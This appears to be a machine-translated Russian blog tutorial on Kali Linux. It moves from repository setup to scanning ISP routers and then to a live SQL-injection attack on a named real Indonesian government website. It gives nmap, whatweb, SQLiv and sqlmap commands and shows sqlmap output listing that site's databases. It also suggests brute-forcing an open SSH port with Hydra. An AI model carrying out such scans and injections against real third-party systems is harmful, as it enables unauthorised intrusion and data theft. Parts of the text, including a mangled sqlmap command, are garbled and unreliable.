Kali Linux Tutorial – Linux Гайд

Если вы эксперт или хотя бы знакомы с Linux, командами и средой, просто установите Kali Linux. на своей машине, хотел стать мастером Kali Linux или этичным хакером, тогда вы в правильнном место. В этой статье я расскажу об учебнике Kali Linux для пользователей Linux, которые еще не знакомы с Kali и познакомить вас с некоторыми из основных методов, используемых для взлома и тестирования безопасности при использовании Kali.

Что такое Kali Linux?

Kali Linux, (впервые выпущен 13 марта 2013 г.), который был формально известен как BackTrack, разработанный охранной фирмой Offensive Security, представляет собой криминалистический и ориентированный на безопасность дистрибутив, основанный на ветке тестирования Debian. Kali Linux разработан с учетом тестирования на проникновение, восстановления данных и обнаружения угроз. В начале этого года проект перешел на модель скользящего выпуска, чтобы предоставить пользователям дистрибутива более современные утилиты безопасности. Kali Linux бесплатна и всегда будет. В него включено более 600 инструментов для тестирования на проникновение.

Почему именно Kali Linux? Вам это подходит?

Kali Linux в последнее время приобрел большую популярность. И этому есть причина. Хакерство снова стало классной вещью в популярной культуре, и это можно во многом отнести к сериалу «Мистер Робот». Популярность г-на Робота помогла Kali Linux найти новых пользователей. Люди, практически не знакомые с Linux или чем-либо, связанным с компьютерной безопасностью, теперь пытаются использовать Kali в качестве основного дистрибутива Linux.

«Наш самый продвинутый дистрибутив для тестирования на проникновение». – Разработчики Kali Linux. (Это написано на главной странице Kali.org в самом верху страницы.) Что вы получаете из этого утверждения? Вы заметили это: APTD (Распространение расширенного тестирования на проникновение)? Здесь буквально нет термина «взлом». Kali Linux такой же, как и другие дистрибутивы Linux. Проще говоря, это дистрибутив Linux, наполненный инструментами безопасности и ориентированный на экспертов по сетевой и компьютерной безопасности. Однако использование Kali Linux сосредоточено только на безопасности и криминалистике.

Дистрибутив Linux – это не что иное, как комплект, содержащий ядро ​​Linux, набор основных утилит и приложений, а также некоторые настройки по умолчанию. Итак, Kali Linux не предлагает чего-то уникального в том смысле, что большинство предоставляемых инструментов можно было бы установить в любом дистрибутиве Linux.

Kali Linux специально разработан для удовлетворения требований профессионального тестирования на проникновение и аудита безопасности. Он нацелен на определенную группу пользователей Linux. Пентестеры, хакеры и т. Д. Это не рекомендуемый дистрибутив, если вы ожидаете Kali для рабочего стола Linux общего назначения для разработки, веб-дизайна, игр, офиса и т. Д. Kali может доставить вам некоторые проблемы, даже если вы опытный пользователь Linux.

ЧТО ДЕЛАТЬ ПОСЛЕ УСТАНОВКИ KALI LINUX

После установки Kali Linux вы можете задаться вопросом, что с этим делать дальше, не так ли? С этой проблемой сталкиваются все, не волнуйтесь.

ШАГ 1: НАСТРОЙКА ХРАНИЛИЩА

Во-первых, вы, возможно, уже знаете это, но очень важно правильно настроить репозиторий. Как я уже сказал, модель скользящего выпуска Kali Linux направлена ​​на предоставление пользователям дистрибутива более современных утилит безопасности. Обычно, если у вас недавно установлен Kali Linux, репозиторий ссылается на носитель, который вы используете для установки. Чтобы исправить это, вам нужно изменить репозиторий на официальный репозиторий Kali Linux. Требуемый файл находится в /etc/apt/sources.list. Откройте файл с помощью текстового редактора листовой панели и замените репозиторий по умолчанию на этот официальный репозиторий Kali Rolling:

деб 
http://http.kali.org/kali kali-Rolling main contrib non-free. 
# Для доступа к исходному пакету раскомментируйте следующую строку. # deb-src http://http.kali.org/kali kali-Rolling main contrib non-free. 

ШАГ 2: ОБНОВЛЕНИЕ И ОБНОВЛЕНИЕ KALI LINUX

После этого обновления и обновления вашей системы синхронизируйте Kali Linux с последней версией. Для этого откройте терминал и введите:

apt update -y && apt upgrade -y && apt dist-upgrade. 

Команда «apt update» загружает и извлекает информацию о списках пакетов из репозиториев и «обновляет» их, чтобы получить информацию о новейших версиях пакетов и их зависимостях.

Команда «apt upgrade» загружает и устанавливает более новую версию пакетов установленных пакетов Kali Linux, если в ней нет ошибок в зависимостях.

«Apt dist-upgrade» обновит все пакеты до последней доступной версии, несмотря ни на что. А также установите и удалите зависимости по мере необходимости (установите зависимости для удовлетворения пакетов, очевидно, но также удалите зависимости, которые стали осиротевшими, если обновленный пакет больше не нуждался в зависимость.

БАЗОВАЯ КОНЦЕПЦИЯ ПЕНЕТРАЦИОННОГО ТЕСТИРОВАНИЯ С KALI LINUX

После того, как вы успешно выполнили эти шаги, есть три основных вещи, которые вы можете сделать с Kali Linux на основе целевой системы, включая:

  1. Взлом беспроводной сети – Взлом Wi-Fi, Phising, ARP Poisoning и т. Д.
  2. Взлом веб-приложений – Внедрение SQL, подделка межсайтовых запросов (CSRF), веб-фишинг и т. Д.
  3. Взлом устройства – Используйте целевую машину, чтобы получить над ней контроль.

Я не говорю о взломе Интернета вещей, это не означает, что Kali Linux не имеет возможности для этого. Но в буквальном смысле это тоже может относиться к взлому устройств. Поскольку устройство имеет внешний вид и форму. В этом уроке я рассмотрел их базовые знания. Поскольку Kali Linux огромен, его не уместить в одной статье!

Вам также необходимо знать цикл или процедуру тестирования на проникновение. Они есть:

  1. Разведка – сбор информации
  2. Сканирование
  3. Эксплуатация
  4. Постэксплуатация

ВЗЛОМ БЕСПРОВОДНОЙ СЕТИ С KALI LINUX

Что касается взлома беспроводной сети, жертвы могут быть разными. Потому что беспроводные сети состоят из нескольких вещей, таких как ISP (поставщик Интернет-услуг), маршрутизатор и его «партнеры» (модем, концентратор, коммутатор и т. Д.) И клиенты (пользователи, система видеонаблюдения, удаленный компьютер и т. Д.). У них также есть уязвимые возможности.

Интернет – это большая и сложная совокупность сетевого оборудования, соединенного между собой шлюзами. Отслеживание маршрута, по которому следуют ваши пакеты, важно, чтобы знать, как вы достигаете определенного имени хоста или целевого IP-адреса.

Kali Linux имеет встроенный инструмент Traceroute. Traceroute использует поле «время жизни» протокола IP и пытается вызвать ответ ICMP TIME_EXCEEDED от каждого шлюза на пути к некоторому хосту. Traceroute пытается отследить маршрут, по которому IP-пакет будет следовать к некоторому интернет-хосту, запустив зондирующие пакеты с небольшим TTL (время жизни), а затем прослушивание ответа ICMP «время истекло» от шлюз. Я дам вам пример и покажу, как отследить маршрутизатор интернет-провайдера, используемый для обработки нашего соединения, с помощью Traceroute.

1. Разведка

Сбор информации – это самый важный толчок, не пропустите этот шаг. На этом этапе наша цель – получить как можно больше полезной информации, которую мы могли бы получить, а затем эта информация используется для дальнейших шагов.

Сначала откройте терминал и введите эту команду, чтобы начать отслеживание «дороги» к сайту, в данном случае я установил сайт на google.com.

traceroute google.com. 

2. Сканирование

После того, как мы запустим команды, он будет перечислять, куда идет наш пакет по порядку. Как вы можете видеть выше, у меня есть 3 перехода, один из которых является моим сервером интернет-провайдера. Первый IP-адрес в списке – это мой маршрутизатор, который действует как шлюз. И следующие два из них принадлежат моему провайдеру. Теперь давайте проверим службу, которую они запускают, с помощью Nmap. Итак, цели, которые мы собираемся сканировать, 10.152.192.1 и 10.13.223.102. В терминале я выполнил следующую команду:

nmap -v -sS [IP-адрес] -Pn. 

Давайте разберем аргумент команды:

-v = Включить режим детализации

-sS = Использовать технику сканирования TCP SYN

-Pn = рассматривать все хосты как подключенные – пропустить обнаружение хостов

И вот результат, который мы получили.

К сожалению, все порты включены 10.152.192.1 фильтруются, это означает, что все входящие TCP-соединения блокируются IDS или брандмауэром на этом IP-адресе. Теперь давайте сделаем еще одно сканирование второй цели.

3. Эксплуатация

В этой процедуре я не собираюсь проводить настоящую эксплуатацию, вместо этого я покажу вам, как это сделать. Основываясь на приведенном выше результате сканирования Nmap, мы знаем, что на этом IP-адресе есть SSH-сервер, работающий на порту 22, и он открыт. Он открыт для грубого обращения, ха-ха! Мы нашли дыру, этот SSH-сервер – возможная дыра, в которую мы могли бы попытаться получить доступ. В Kali Linux есть несколько инструментов, которые поддерживают грубые атаки или атаки по словарю на протокол SSH. Самая популярная и мощная – «Гидра».

Хорошо, это была основная процедура проведения теста на проникновение для целевого сервера, которым в нашем примере является мой сервер интернет-провайдера.

ВЗЛОМ ВЕБ-ПРИЛОЖЕНИЙ С KALI LINUX

На самом деле, если вы увлечены этим, вы можете настроить свою хакерскую среду, установив DWVA (Damn Vulnerable Web App) в свой Kali Linux. Это веб-приложение PHP / MySQL, в котором есть множество уязвимых мест. Его основные цели – помочь специалистам по безопасности проверить свои навыки и инструменты в правовой среде, а также помочь веб-разработчикам лучше понять процессы защиты веб-приложений. Вы можете получить DWVA бесплатно на Github здесь: https://github.com/ethicalhack3r/DVWA.

А пока я покажу вам, как взломать веб-приложения на реальном сайте. Но, пообещайте мне, это ограничено только образовательной целью. Мы смоделируем реальную атаку на реальном сайте с помощью SQL-инъекции.

Предварительное условие

Охватываемые инструменты:

– Whatweb (предустановлен)

– Nmap (предустановлен)

– SQLiv (установить вручную)

– SQLMap (предустановлен)

Нам нужен еще один дополнительный инструмент, который доступен на Github здесь: https://github.com/Hadesy2k/sqliv, сначала установите его в наш Kali Linux. Этот инструмент под названием SQLiv может выполнять целевое сканирование, предоставляя определенный домен (со сканированием). Введите в терминал:

git clone https://github.com/Hadesy2k/sqliv.git. cd sqliv && sudo python2 setup.py -i. 

Цель: www.trenggalekkab.go.id

1. Разведка

Соберите как можно больше полезной информации. Мы могли бы открыть веб-страницу и определить, какое приложение работает на этом сайте. Во-первых, давайте проверим, что это за веб-сайт. Мы собираемся использовать для этого «whatweb».

whatweb www.trenggalekkab.go.id. 

Как видно из приведенного выше результата, цель находится в Индонезии. Он работает Apache v2.2.27 на своем веб-сервере, а также PHP v5.4.31, у него есть IP-адрес 103.247.21.142. Хорошо, прими это к сведению. Возможно, вам потребуется посетить его веб-страницу, чтобы найти созданный файл или страницу, параметры URL-адреса или даже форму входа. На данный момент нам нужен этот IP-адрес для следующего шага сканирования.

2. Сканирование

Как и раньше, мы снова используем Nmap, чтобы сканировать, какие порты и службы работают на целевой машине.

nmap -v -sS 103.247.21.142 

И вот результат:

Сканирование SYN Stealth завершено в 21:22, прошло 261,93 с (всего 1000 портов) Отчет о сканировании Nmap для ip-103-247-21-142.wifian.net.id (103.247.21.142) Хост работает (задержка 0,069 с). Не показано: 985 закрытых портов. 
ПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА. 21 / tcp открыть ftp. 25 / tcp открыть smtp. 53 / tcp открытый домен. 80 / tcp открыть http. 110 / tcp открыть pop3. 111 / tcp открыть rpcbind. 143 / tcp открыть imap. 212 / tcp открытый анет. 443 / tcp открыть https. 465 / tcp открыть smtps. 587 / tcp открытое представление. 993 / tcp открыть imaps. 995 / tcp открыть файлы pop3. 3128 / tcp отфильтрованный squid-http.3306 / tcp открыть mysql

Есть множество открытых портов, которые обрабатывают каждую службу на целевом сервере, но тот, который выглядит «привлекательным», – это служба mysql на порту 3306. Указывается, что этот сайт использует MySQL управлять своей информацией в базах данных. Тогда мне интересно, есть ли на этом сайте уязвимости SQL-инъекций. Итак, я снова просматриваю сайт, используя только что установленный SQLiv. Я набрал команду:

sqliv -t www.trenggalekkab.go.id. 
На этом сайте мы обнаружили 2 возможных уязвимых URL-адреса SQL. Запишите эти URL-адреса.

3. Эксплуатация

Хорошо, у нас есть уязвимые URL-адреса SQL, и они готовы к выполнению. Для этого мы будем использовать SQLMap. Синтаксис:

sqlmap «[Уязвимый URL]» --dbs. 
Команда должна выглядеть так:

 sqlmap -u & amp; amp; amp; amp; amp; amp; amp; amp; quot; http://www.trenggalekkab.go.id/berita.php? page = 208 & amp; amp; amp; amp; amp; amp; amp; amp; quot; - дБ. 
Аргумент «–dbs» указывает SQLMap на получение целевых баз данных. Вот результат, который мы получили:

[ИНФОРМАЦИЯ] внутренняя СУБД - это MySQL. технология веб-приложений: PHP 5.4.31, Apache 2.2.27. внутренняя СУБД: MySQL 5. [21:46:04] [INFO] получение имен баз данных. [21:46:04] [ИНФОРМАЦИЯ] используемый запрос SQL возвращает 2 записи. [21:46:04] [INFO] возобновлено: information_schema. [21:46:04] [ИНФОРМАЦИЯ] возобновлена: trengkab_trg. доступные базы данных [2]: [*] information_schema. [*] trengkab_trg. 
SQLMap обнаружил 2 базы данных, но только одна из них содержит конфиденциальные данные, например учетную запись администратора. То есть на «trengkab_trg». После того, как мы нашли базы данных, нам нужно сделать еще один шаг. То есть найти таблицы и столбцы, и последний шаг - выгрузить данные. Я не буду показывать вам, как здесь, в этом разделе, используя эту цель. По крайней мере, вы знаете основную идею цикла атаки и используете некоторые инструменты.

ВЗЛОМ УСТРОЙСТВА
В следующей статье на этом сайте мы расскажем о взломе устройств, следите за обновлениями. В качестве предварительного предупреждения вы захотите убедиться, что знаете для этого немного Python.
https://t.me/linuxkalii

Ответить